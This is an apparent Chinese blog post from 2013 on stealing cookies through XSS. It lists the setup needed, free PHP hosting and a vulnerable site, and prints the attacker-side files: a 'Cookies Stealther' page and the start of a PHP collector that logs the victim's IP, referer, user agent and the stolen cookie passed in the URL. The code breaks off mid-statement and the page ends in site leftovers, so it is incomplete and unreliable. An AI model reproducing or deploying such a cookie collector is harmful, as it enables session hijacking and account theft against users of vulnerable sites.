利用xss偷cookie的方法
来源:韦江代博客 责任编辑:栏目编辑 发表时间:2013-07-01 11:37 点击:次
最近 flash xss/csrf 很火 大家可以配合使用
使用的工具:
1.免费网页支援PHP
2.存在xss的脆弱的网站。
vb.php为存放cookie的网页
vb.php 代码:
<head>
<meta http-equiv="Content-Language" content="it">
<title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</head>
<body bgcolor="#C0C0C0">
<p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<p align="left"> </p>
</body>
documents.php取得cookie的网页
documents.php 代码:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time =
相关新闻>>
- 发表评论
-
- 最新评论 更多>>